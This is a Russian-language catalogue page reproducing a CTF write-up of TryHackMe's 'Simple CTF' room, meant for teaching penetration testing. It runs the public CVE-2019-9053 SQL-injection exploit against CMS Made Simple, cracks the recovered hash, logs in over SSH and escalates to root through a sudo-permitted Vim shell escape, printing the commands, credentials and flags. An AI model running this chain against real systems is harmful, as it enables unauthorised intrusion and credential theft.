Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Simple-CTF-Writeup — Профессиональное прохождение CTF 'Simple' на TryHackMe, охватывающее разведку, SQL-инъекцию в CMS Made Simple (CVE-2019-9053), восстановление учётных данных, доступ по SSH, повышение привилегий через Vim и компрометацию root. | Kitploit
Инструменты/GitHubGitHub/imperialx1104/simple-ctf-writeup
Взлом паролейПовышение привилегийРазведкаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеОбучение и Образование

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHubimperialx1104/simple-ctf-writeup

Simple-CTF-Writeup

Профессиональное прохождение CTF 'Simple' на TryHackMe, охватывающее разведку, SQL-инъекцию в CMS Made Simple (CVE-2019-9053), восстановление учётных данных, доступ по SSH, повышение привилегий через Vim и компрометацию root.

Репозиторий
2 месяцев назадЕщё не проверено

Simple-CTF-Writeup

Профессиональное прохождение комнаты TryHackMe Simple CTF, охватывающее разведку, SQL-инъекцию в CMS Made Simple (CVE-2019-9053), восстановление учётных данных, доступ по SSH, повышение привилегий через Vim и получение root.

TryHackMe - Прохождение Simple CTF

Полное прохождение комнаты Simple CTF на TryHackMe, охватывающее разведку, перебор, эксплуатацию, восстановление учётных данных, повышение привилегий и захват флагов.


Информация о комнате

ПолеЗначение
ПлатформаTryHackMe
Название комнатыSimple CTF
СложностьЛёгкая
КатегорияВеб-эксплуатация и повышение привилегий в Linux
АвторSaahil Gupta (ImperialX1104)

Цель

Цель этой комнаты:

  • Выполнить разведку целевой машины
  • Обнаружить скрытые службы и приложения
  • Эксплуатировать уязвимую CMS
  • Восстановить учётные данные
  • Получить доступ по SSH
  • Повысить привилегии до root
  • Захватить оба флага

Обзор атаки

root@kitploit:~
Обнаружение хоста
      │
      ▼
Сканирование портов
      │
      ▼
Перебор каталогов
      │
      ▼
Обнаружение CMS
      │
      ▼
Определение версии
      │
      ▼
SQL-инъекция (CVE-2019-9053)
      │
      ▼
Извлечение учётных данных
      │
      ▼
Взлом пароля
      │
      ▼
Доступ по SSH
      │
      ▼
Флаг пользователя
      │
      ▼
Повышение привилегий
      │
      ▼
Флаг root

Разведка

Обнаружение хоста

Первым шагом была проверка связи с целевой машиной.

Команда

root@kitploit:~
ping 10.49.175.174

Результат

Хост успешно ответил, подтвердив, что он доступен.

Скриншот

Проверка связи


Сканирование портов

Было выполнено полное сканирование Nmap для выявления открытых служб.

Команда

root@kitploit:~
nmap -A -v 10.49.175.174

Результаты

ПортСлужбаВерсия
21FTPvsftpd 3.0.3
80HTTPApache 2.4.18
2222SSHOpenSSH 7.2p2

Важные находки

  • Анонимный вход в FTP включён
  • Веб-сервер Apache запущен
  • SSH доступен на порту 2222
  • Обнаружен файл robots.txt

Скриншот

Сканирование Nmap


Веб-разведка

Перейдя на целевой веб-сервер, мы увидели стандартную страницу Apache.

URL

root@kitploit:~
http://10.49.175.174

Скриншот

Стандартная страница Apache

На этом этапе очевидной поверхности атаки не было.


Перебор каталогов

Для поиска скрытых ресурсов был выполнен перебор каталогов с помощью FFUF.

Команда

root@kitploit:~
ffuf -u http://10.49.175.174/FUZZ \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt \
-fc 200

Результаты

root@kitploit:~
simple [Status: 301]

Скриншот

Перебор FFUF

Был обнаружен каталог /simple.


Обнаружение CMS

Перейдя по найденному каталогу, мы обнаружили установленную CMS.

URL

root@kitploit:~
http://10.49.175.174/simple

Скриншот

CMS Made Simple

Определённая CMS

root@kitploit:~
CMS Made Simple 2.2.8

Номер версии впоследствии оказался критическим.


Поиск уязвимости

Версия CMS была исследована с помощью SearchSploit.

Команда

root@kitploit:~
searchsploit "CMS Made Simple"

Результат

root@kitploit:~
CMS Made Simple < 2.2.10 - SQL Injection

Скриншот

Результаты SearchSploit

Была выявлена известная SQL-инъекция.


Получение эксплойта

Эксплойт был скопирован локально для анализа и выполнения.

Команда

root@kitploit:~
searchsploit -m 46635

Вывод

root@kitploit:~
CMS Made Simple < 2.2.10 - SQL Injection
CVE-2019-9053

Скриншот

Загрузка эксплойта


Эксплуатация

Публично доступный эксплойт был запущен против целевой CMS.

Команда

root@kitploit:~
python3 exploit.py \
-u http://10.49.175.174/simple/ \
--crack \
-w /usr/share/wordlists/rockyou.txt

Извлечение учётных данных

Эксплойт успешно извлёк информацию из базы данных.

Вывод

root@kitploit:~
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: [email protected]

Скриншот

Извлечение учётных данных

Полученная информация

ЭлементЗначение
Имя пользователяmitch
Email[email protected]
Salt1dac0d92e9fa6bb2

Взлом пароля

Извлечённый хеш был взломан с помощью Hashcat.

Команда

root@kitploit:~
hashcat -m 20 hash.txt --show

Вывод

root@kitploit:~
0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2:secret

Восстановленные учётные данные

ПолеЗначение
Имя пользователяmitch
Парольsecret

Скриншот

Восстановление пароля с помощью Hashcat


Первоначальный доступ

Восстановленные учётные данные были проверены на SSH-службе.

Команда

root@kitploit:~
ssh [email protected] -p 2222

Пароль

root@kitploit:~
secret

Результат

root@kitploit:~
Welcome to Ubuntu 16.04.6 LTS

Скриншот

SSH-доступ

Успешная аутентификация предоставила доступ к оболочке от имени пользователя mitch.


Флаг пользователя

После получения доступа флаг пользователя был найден в домашнем каталоге Mitch.

Команды

root@kitploit:~
whoami
cd ~
cat user.txt

Вывод

root@kitploit:~
G00d j0b, keep up!

Скриншот

Флаг пользователя


Повышение привилегий

Проверка sudo

Проверка прав sudo выявила интересную конфигурацию.

Команда

root@kitploit:~
sudo -l

Вывод

root@kitploit:~
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim

Скриншот

Вывод sudo -l

Эта конфигурация позволяет пользователю запускать Vim с привилегиями root без ввода пароля.


Доступ от root

Запуск Vim с правами root:

root@kitploit:~
sudo vim

Поскольку Vim работал с повышенными привилегиями, его можно было использовать для доступа к файлам, принадлежащим root.

Скриншот

Доступ от root через Vim


Флаг root

Флаг root был найден в каталоге пользователя root.

Команда

root@kitploit:~
:! cat /root/root.txt

Вывод

root@kitploit:~
W3ll d0n3. You made it!

Скриншот

Флаг root


Захваченные флаги

Флаг пользователя

root@kitploit:~
G00d j0b, keep up!

Флаг root

root@kitploit:~
W3ll d0n3. You made it!

Сводка цепочки атак

root@kitploit:~
Сканирование Nmap
    ↓
Веб-разведка
    ↓
Обнаружение каталога (/simple)
    ↓
CMS Made Simple 2.2.8
    ↓
Поиск через SearchSploit
    ↓
CVE-2019-9053 SQL-инъекция
    ↓
Извлечение учётных данных
    ↓
Взлом хеша
    ↓
Вход по SSH (mitch:secret)
    ↓
Флаг пользователя
    ↓
sudo -l
    ↓
Повышение привилегий через Vim
    ↓
Флаг root

Выводы

Разведка имеет значение

Уязвимая CMS не была видна на главной странице и требовала перебора каталогов для обнаружения.

Определение версии критически важно

Знание точной версии CMS привело напрямую к известной уязвимости.

Повторное использование учётных данных

Восстановленные учётные данные следует всегда проверять на всех доступных службах.

Неправильная настройка sudo опасна

Разрешение привилегированного выполнения редакторов, таких как Vim, может привести к полной компрометации системы.


Использованные инструменты

  • Nmap
  • FFUF
  • SearchSploit
  • Python
  • Hashcat
  • SSH
  • Vim

Заключение

Эта комната продемонстрировала полную цепочку атак — от первоначальной разведки до полного получения root. Комбинируя методы перебора веб-приложений, эксплуатации SQL-инъекций, взлома паролей и повышения привилегий в Linux, был достигнут полный контроль над целевой системой.

Комната служит отличным введением в методологию реального пентеста и подчёркивает важность своевременного обновления программного обеспечения, безопасности учётных данных и контроля доступа по принципу минимальных привилегий.


Автор

Saahil Gupta (ImperialX1104)

  • GitHub: https://github.com/ImperialX1104
  • TryHackMe: ImperialX

⭐ Если вам показалось это прохождение полезным, подумайте о том, чтобы поставить звезду репозиторию и связаться со мной на GitHub.

Скачать инструмент